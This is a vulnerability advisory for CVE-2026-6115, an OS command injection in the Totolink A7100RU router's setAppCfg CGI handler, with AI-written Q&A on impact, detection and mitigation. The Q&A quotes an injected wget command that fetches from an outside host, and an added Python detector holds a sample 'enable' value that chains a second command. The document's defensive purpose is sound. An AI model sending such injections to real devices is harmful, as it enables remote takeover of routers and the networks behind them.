CVE-2026-6115
Received - Intake
OS Command Injection in Totolink A7100RU CGI Handler (Remote

Publication date: 2026-04-12

Last updated on: 2026-04-12

Assigner: VulDB

Description
A flaw has been found in Totolink A7100RU 7.4cu.2313_b20191024. This affects the function setAppCfg of the file /cgi-bin/cstecgi.cgi of the component CGI Handler. Manipulating the argument enable can lead to OS command injection. The attack may be launched remotely. The exploit has been published and may be used.
Meta Information
Published: 2026-04-12
Last Modified: 2026-04-12
Generated: 2026-05-07
AI Q&A: 2026-04-12
EPSS Evaluated: 2026-05-05
Affected Vendors & Products
Showing 1 associated CPE
Vendor: totolink
Product: a7100ru
Version / Range: 7.4cu.2313_b20191024
CWE ID Description
CWE-77 The product constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.
CWE-78 The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2026-6115 is a command injection vulnerability found in the TOTOLINK A7100RU router, version 7.4cu.2313_b20191024. It exists in the CGI Handler component, specifically in the function setAppCfg of the file /cgi-bin/cstecgi.cgi. The vulnerability arises from improper handling of the "enable" parameter, which is passed to a system command execution function without proper sanitization.

An attacker can send a specially crafted HTTP POST request containing a malicious "enable" parameter value that gets executed on the router's operating system. This allows remote attackers to execute arbitrary OS commands on the affected device.

For example, an attacker can inject commands like `wget 192.168.6.1:7777/testpoc` which the router will execute, demonstrating the ability to run arbitrary commands remotely.


How can this vulnerability impact me?

This vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router without any authentication.

  • Attackers can take full control of the router, potentially altering its configuration or behavior.
  • It can be used to install malware, create backdoors, or pivot to other devices on the network.
  • The router could be used as part of a botnet or to intercept and manipulate network traffic.
  • Overall, it poses a significant security risk to the network and connected devices.

How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring for suspicious HTTP POST requests sent to the endpoint /cgi-bin/cstecgi.cgi on the Totolink A7100RU router. Specifically, look for POST requests containing a JSON payload with the parameter "enable" set to unusual or command-like values.

A practical detection method is to capture network traffic and search for POST requests to /cgi-bin/cstecgi.cgi with payloads that include the "enable" parameter. For example, use tools like tcpdump or Wireshark to filter HTTP POST requests to this URI.

Example commands to detect such activity include:

  • Using tcpdump to capture HTTP POST requests to the vulnerable endpoint: `tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)' | grep -i 'POST /cgi-bin/cstecgi.cgi'`
  • Using curl or similar tools to test if the device is vulnerable by sending a crafted POST request with a malicious "enable" parameter.

Detection can also involve checking device logs for unexpected execution of commands or network connections initiated by the router, such as wget commands to unknown IP addresses.
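
The check described above, written as an added example (not code from the advisory or from Totolink): it classifies raw HTTP requests by endpoint and by the content of the "enable" value. The benign-value pattern, the verdict names and the sample requests are assumptions constructed for illustration.

```python
import json
import re

VULN_PATH = "/cgi-bin/cstecgi.cgi"
# Assumption (not from the advisory): a benign on/off switch carries one of these.
BENIGN_ENABLE = re.compile(r"^[0-9]{1,3}$|^(true|false|on|off)$", re.I)
# Characters a shell treats as command separators, substitution or redirection.
SHELL_META = re.compile(r"[;&|`$<>\n\r(){}]")


def inspect_request(raw: bytes):
    """Classify one raw HTTP/1.x request as ignore / ok / review / alert."""
    head, _, body = raw.partition(b"\r\n\r\n")
    parts = head.split(b"\r\n", 1)[0].decode("latin-1").split()
    if len(parts) < 2 or parts[0].upper() != "POST":
        return ("ignore", "not a POST")
    if parts[1].split("?", 1)[0] != VULN_PATH:
        return ("ignore", "other endpoint")
    try:
        payload = json.loads(body.decode("utf-8", "replace"))
    except ValueError:
        return ("review", "unparseable body sent to the CGI handler")
    if not isinstance(payload, dict) or "enable" not in payload:
        return ("ignore", "no enable parameter")
    value = str(payload["enable"])
    if SHELL_META.search(value):
        return ("alert", f"shell metacharacter in enable: {value!r}")
    if not BENIGN_ENABLE.match(value):
        return ("review", f"unexpected enable value: {value!r}")
    return ("ok", "enable looks like a plain switch value")


def build_request(method, path, body):
    """Build a constructed sample request (test data, not captured traffic)."""
    data = json.dumps(body).encode()
    head = f"{method} {path} HTTP/1.1\r\nHost: 192.0.2.1\r\nContent-Length: {len(data)}\r\n\r\n"
    return head.encode() + data


SAMPLES = {
    "benign": build_request("POST", VULN_PATH, {"enable": "1"}),
    "chained": build_request("POST", VULN_PATH, {"enable": "1; echo constructed"}),
    "odd": build_request("POST", VULN_PATH, {"enable": "maybe yes"}),
    "other": build_request("POST", "/index.html", {"enable": "1; echo constructed"}),
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw))
```

The same function can be fed request bytes reassembled from a packet capture or from a reverse proxy's request log; it only sees cleartext HTTP.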


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps include restricting access to the vulnerable endpoint /cgi-bin/cstecgi.cgi to trusted networks only, such as by implementing firewall rules that block external access to the router's management interface.

Disabling remote management features on the Totolink A7100RU router can reduce the attack surface and prevent remote exploitation.

Monitoring and blocking suspicious HTTP POST requests targeting the "enable" parameter can help prevent exploitation attempts.

If available, applying firmware updates or patches from the vendor that address this vulnerability is the most effective long-term mitigation.

As a temporary workaround, consider isolating the device from untrusted networks until a patch is applied.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

The vulnerability allows remote attackers to execute arbitrary operating system commands on the affected TOTOLINK A7100RU router. This can lead to unauthorized access, data breaches, and potential compromise of sensitive information.

Such security risks can negatively impact compliance with common standards and regulations like GDPR and HIPAA, which require protection of personal and sensitive data against unauthorized access and breaches.

However, the provided information does not explicitly detail the direct effects on compliance with these standards.

